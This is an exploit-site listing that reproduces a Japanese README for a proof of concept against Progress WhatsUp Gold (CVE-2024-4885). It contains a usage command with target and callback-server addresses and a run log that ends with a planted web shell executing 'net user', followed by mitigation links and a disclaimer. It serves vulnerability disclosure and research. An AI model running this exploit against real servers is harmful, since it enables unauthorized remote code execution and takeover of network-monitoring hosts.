Sploitus

Exploit for CVE-2024-4885

kitploit · 2026-09-02

Exploit Code

MARKDOWN82 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-SINSINOLOGY-CVE-2024-4885
# CVE-2024-4885

CVE-2024-4885 の PoC: Progress WhatsUp Gold の GetFileWithoutZip における認証なしリモートコード実行 (CVE-2024-4885) ![ZDI](https://assets.kitploit.com/production/public/readmes/32621/cd44cecabb2bac0a0fded473457dace8c1c06a8ec5ca5adac544c7e2980ca23b.gif)

## 技術分析

この脆弱性の根本原因分析は私のブログで公開されています: https://summoning.team/blog/progress-whatsup-gold-rce-cve-2024-4885/

![ZDI](https://assets.kitploit.com/production/public/readmes/32621/b64d19f3ef39a762923b7403175dbef882b71ba5243b8e4b297a2d32fda8fa50.jpg)

## 使用方法

root@kitploit:~
    
    
    python3 CVE-2024-4885.py -t http://192.168.0.231:9642 -s 192.168.0.181:1337 -f hax.aspx
    
     _______ _     _ _______ _______  _____  __   _ _____ __   _  ______   _______ _______ _______ _______
     |______ |     | |  |  | |  |  | |     | | \  |   |   | \  | |  ____      |    |______ |_____| |  |  |
     ______| |_____| |  |  | |  |  | |_____| |  \_| __|__ |  \_| |_____| .    |    |______ |     | |  |  |
    
            (*) Progress WhatsUp Gold GetFileWithoutZip Unauthenticated Remote Code Execution (CVE-2024-4885)
    
            (*) Exploit by Sina Kheirkhah (@SinSinology) of SummoningTeam (@SummoningTeam)
    
            (*) Technical details: https://summoning.team/blog/progress-whatsup-gold-rce-cve-2024-4885/
    
    
    
    (^_^) Prepare for the Pwnage (^_^)
    
    (+) Sending payload to http://192.168.0.231:9642/NmConsole/ReportService.asmx
    (*) Callback server listening on http://192.168.0.181:1337
    (+) Payload sent successfully
    (*) Checking if target is using HTTPS or HTTP https://192.168.0.231/NmConsole/
    (*) Target host: https://192.168.0.231
    (*) spraying... https://192.168.0.231/NmConsole/Data/ExportedReports/a70d6fde3f82e3b9_2024-07-06_23-31-24.aspx
    (+) Callback received
    192.168.0.231 - - [06/Jul/2024 23:31:30] "GET /Session/Login/?sUsername=admin&sPassword=3,0,0,0,16,0,0,0 HTTP/1.1" 200 -
    192.168.0.231 - - [06/Jul/2024 23:31:30] "PUT /api/core/render HTTP/1.1" 200 -
    (*) spraying... https://192.168.0.231/NmConsole/Data/ExportedReports/a70d6fde3f82e3b9_2024-07-06_23-31-25.aspx
    (*) spraying... https://192.168.0.231/NmConsole/Data/ExportedReports/a70d6fde3f82e3b9_2024-07-06_23-31-26.aspx
    (*) spraying... https://192.168.0.231/NmConsole/Data/ExportedReports/a70d6fde3f82e3b9_2024-07-06_23-31-27.aspx
    (*) spraying... https://192.168.0.231/NmConsole/Data/ExportedReports/a70d6fde3f82e3b9_2024-07-06_23-31-28.aspx
    (*) spraying... https://192.168.0.231/NmConsole/Data/ExportedReports/a70d6fde3f82e3b9_2024-07-06_23-31-29.aspx
    (*) spraying... https://192.168.0.231/NmConsole/Data/ExportedReports/a70d6fde3f82e3b9_2024-07-06_23-31-30.aspx
    (*) spraying... https://192.168.0.231/NmConsole/Data/ExportedReports/a70d6fde3f82e3b9_2024-07-06_23-31-31.aspx
    (*) spraying... https://192.168.0.231/NmConsole/Data/ExportedReports/a70d6fde3f82e3b9_2024-07-06_23-31-32.aspx
    (*) spraying... https://192.168.0.231/NmConsole/Data/ExportedReports/a70d6fde3f82e3b9_2024-07-06_23-31-33.aspx
    (+) Web shell found at -> https://192.168.0.231/NmConsole/Data/ExportedReports/a70d6fde3f82e3b9_2024-07-06_23-31-33.aspx
    Shell> net user
    
    User accounts for \\
    
    -------------------------------------------------------------------------------
    Administrator            debugger                 DefaultAccount
    Guest                    WDAGUtilityAccount
    The command completed with one or more errors.
    
    
    Shell>
    

## 緩和策

最新バージョンに更新するか、Progress Advisory の指示に従って緩和してください。

  * https://community.progress.com/s/article/WhatsUp-Gold-Security-Bulletin-June-2024



## 最新のセキュリティ研究を Twitter(X) でフォロー:

  * SinSinology
  * SummoningTeam



## 免責事項

このソフトウェアは、学術研究と効果的な防御技術の開発のみを目的として作成されており、明示的に許可された場合を除き、システムへの攻撃に使用することを意図したものではありません。プロジェクトのメンテナは、ソフトウェアの誤用について一切の責任を負いません。責任を持って使用してください。